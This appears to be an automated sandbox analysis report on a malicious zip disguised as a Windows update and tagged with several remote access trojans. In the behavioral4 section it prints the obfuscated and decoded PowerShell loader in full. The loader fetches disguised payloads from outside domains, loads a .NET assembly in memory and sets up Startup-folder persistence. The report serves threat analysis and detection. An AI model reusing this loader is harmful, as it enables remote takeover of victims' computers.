Malware Analysis Report

2025-01-02 12:13

Sample ID 240419-jnprkacc56
Target 19042024_1547_windows_update.zip
SHA256 b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf
Tags
asyncrat venom clients rat xworm zgrat trojan default
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf

Threat Level: Known bad

The file 19042024_1547_windows_update.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat venom clients rat xworm zgrat trojan default

AsyncRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

ZGRat

Detect Xworm Payload

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 07:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

117s

Max time network

118s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

Network

N/A

Files

memory/2468-4-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2468-5-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/2468-6-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-7-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-8-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-9-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-11-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-10-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-12-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-13-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-14-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-15-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-16-0x0000000002C80000-0x0000000002D00000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240226-en

Max time kernel

134s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebwBkDgTreGUDgTrebgBjDgTreGsDgTrebwDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5164 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp
US 8.8.8.8:53 30.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz3l0qr.w4f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5060-9-0x000001566BC20000-0x000001566BC42000-memory.dmp

memory/5060-19-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/5060-20-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/5060-21-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/3828-22-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/3828-23-0x000002882A830000-0x000002882A840000-memory.dmp

memory/3828-24-0x000002882A830000-0x000002882A840000-memory.dmp

memory/5060-25-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/3828-26-0x000002882A830000-0x000002882A840000-memory.dmp

memory/3828-27-0x0000028810710000-0x000002881075E000-memory.dmp

memory/4352-28-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/4352-29-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-39-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-40-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-47-0x00007FF893D60000-0x00007FF894821000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4f83e6b9df15851d271e8fbb8d137c9d
SHA1 52a44ba02fd59791f303362bbab53451ff48932e
SHA256 d12625e429c0df81d4e9cc99d25d64e4c091c76992ef035fb9816a4b8a973fe0
SHA512 4e67a88c08e1796d4c6717a757355ca03cdb9aa594527340e6bb873fee7f97cdd5012fe53064cfdae7d89417ab4d80c71b5acc0fe733acc2273063680198b68a

memory/3828-51-0x00007FF893D60000-0x00007FF894821000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/5060-54-0x00007FF893D60000-0x00007FF894821000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
